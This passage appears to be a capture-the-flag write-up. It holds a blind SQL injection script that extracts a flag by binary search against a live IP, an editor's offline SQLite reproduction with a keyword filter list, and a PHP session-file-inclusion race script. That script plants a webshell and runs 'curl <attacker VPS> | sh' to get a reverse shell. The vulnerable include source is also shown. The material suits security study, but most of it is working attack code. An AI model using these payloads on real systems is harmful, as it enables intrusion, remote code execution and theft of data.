    assert '已傳送申請' in r.text, title

def check_sql(sql):
    global aid
    if aid % 10 == 0:
        clear_list()
        add_ads('1')
    sql = sql.replace(' ', '/**/')
    add_ads(f"'||{sql}||'")
    requests.get(f'http://120.79.141.85:47930/index.php', cookies=cookies)
    r = requests.get(f'http://120.79.141.85:47930/detail.php', params={'id': str(aid)}, cookies=cookies)
    return '待管理確認' in r.text

class CharBinarySearch:
    def __init__(self):
        self.l = 0
        self.r = 128

    def is_done(self):
        return self.l + 1 >= self.r

    def middle(self):
        return (self.l + self.r) // 2

    def update(self, r):
        if r:
            self.l = self.middle()
        else:
            self.r = self.middle()

def main():
    global aid
    aid = 0

    clear_list()
    add_ads('1')
    r = requests.post('http://120.79.141.85:47930/index.php', cookies=cookies)
    aid = int(re.search(RE, r.text).group(1))
    print(f'Initial ID: {aid}')

    # # 可爆破出列數
    # for i in range(1, 64):
    #     s = ','.join(["''"] * i)
    #     r = check_sql(f"(SELECT (SELECT {s})<(SELECT * FROM flag LIMIT 1))=true")
    #     print(i, r)

    content = ''
    for i in range(len(content) + 1, 128):
        s = CharBinarySearch()
        while not s.is_done():
            # r = check_sql(f"(SELECT HEX(SUBSTR(database(),{i},1))>=HEX({s.middle()}))")

            p = content + chr(s.middle())
            p = hex(int.from_bytes(p.encode(), 'big'))
            r = check_sql(f"(SELECT (SELECT * FROM flag) >= (SELECT 1, {p})) = 1")
            # r = check_sql(f"((SELECT HEX(SUBSTR(name,{i},1)) FROM users LIMIT 1 OFFSET 0)>=HEX({s.middle()}))")

            print(f'{i} {s.middle()} => {r}')
            s.update(r)
        content += chr(s.l)
        print(content)

if __name__ == '__main__':
    main()
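Added by the editor, not part of the pasted writeup: the row-value trick and the binary search, run against a constructed in-memory SQLite table so that it executes offline. The target's server-side query is not known from the writeup, so the oracle below simply evaluates the injected condition. Two dialect differences from MariaDB matter: the hex string is written CAST(X'..' AS TEXT) because SQLite's 0x literal is an integer, and SQLite's default BINARY collation is case-sensitive, so this run recovers the exact casing that the target's case-insensitive collation hid. The filter check mirrors the keyword list quoted above; the table and column names are assumptions for the demo.

```python
import sqlite3

FLAG = "flag{Sql_1nj3cti0n_1s_s0_easy}"                  # constructed: the flag quoted above
BLOCKED = ("in", "or", "and", "union", "password")       # keyword filter described in the writeup


def make_db():
    """Constructed stand-in for the target: a flag table whose column names the attacker does not know."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE flag (id INTEGER, secret TEXT)")
    db.execute("INSERT INTO flag VALUES (1, ?)", (FLAG,))
    return db


def passes_filter(sql):
    lowered = sql.lower()
    return not any(word in lowered for word in BLOCKED)


def oracle(db, condition):
    """Boolean oracle: on the target the ad detail page rendered only when the injected
    condition was true; here (assumption) the condition is evaluated directly."""
    if not passes_filter(condition):
        raise ValueError("payload contains a filtered keyword: " + condition)
    return bool(db.execute(f"SELECT ({condition})").fetchone()[0])


def payload(prefix):
    """Row-value comparison: needs only the column count (2) and the first column's value (1),
    not the unknown column name. The guess is passed as hex, so no quotes and no letters
    outside a-f appear, which keeps in/or/and out of the payload."""
    return f"(SELECT * FROM flag) >= (SELECT 1, CAST(X'{prefix.encode().hex()}' AS TEXT))"


def extract(db, max_len=64):
    """Binary search per character: the largest c with flag >= known + chr(c) is the next character."""
    known = ""
    while len(known) < max_len:
        lo, hi = 0, 128                 # invariant: flag >= known+chr(lo) holds, known+chr(hi) does not
        while lo + 1 < hi:
            mid = (lo + hi) // 2
            if oracle(db, payload(known + chr(mid))):
                lo = mid
            else:
                hi = mid
        if lo == 0:                     # not even known + '\x01' fits: end of string
            break
        known += chr(lo)
    return known


if __name__ == "__main__":
    print(extract(make_db()))
```

Each character costs seven requests (log2 of 128), so the 30-character flag above takes about 210 oracle queries; under a case-insensitive collation the predicate is no longer monotonic over the ASCII range, which is why the writeup's author got a flag with no reliable case and had to enumerate the casing separately.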

Web | in (138pt)

Clicking around, http://119.23.247.96:45837/action.php?file=2.txt reads files. Trying to include action.php itself hangs with no output, which suggests the inclusion is done with include.
A quick look shows the server is Apache, so a log-inclusion shell is out; look at the PHP source instead.
Read the source through the wrapper: http://119.23.247.96:45837/action.php?file=php://filter/convert.base64-encode/resource=action.php
session_start() at the top very likely means session file inclusion, so I lazily used the session race-condition template to get a shell.

import io
import requests
import threading

sessid = 'TGAO'
data = {"cmd": "system('curl 106.52.237.196 | sh');"}   # stager fetched from the attacker's VPS


def write(session):
    # Keep uploading with PHP_SESSION_UPLOAD_PROGRESS set: PHP records the upload progress,
    # including this field's value (the webshell), in the session file /tmp/sess_<PHPSESSID>
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post('http://119.23.247.96:45837/action.php',
                            data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'},
                            files={'file': ('tgao.txt', f)}, cookies={'PHPSESSID': sessid})


def read(session):
    # Race: include the session file before PHP cleans the progress entry up after the upload
    while True:
        resp = session.post('http://119.23.247.96:45837/action.php?file=/tmp/sess_' + sessid, data=data)
        if 'tgao.txt' in resp.text:   # the upload filename shows up when the inclusion hit
            print(resp.text)
            event.clear()


if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
    event.set()

Right after running it the reverse shell arrived on the VPS (it probably does not need to be this brute-force).

Method 2:
Read the source of action.php: http://119.23.247.96:47473/action.php?file=php://filter/convert.base64-encode/resource=action.php

<?php
session_start();
error_reporting(0);
$name = $_POST['name'];
if($name){
    $_SESSION["username"] = $name;
}
include($_GET['file']);
?>

This is a session file inclusion; the session file lives at /tmp/sess_PHPSESSID. Write a webshell into it, run ls / to find the flag's filename, then read it.

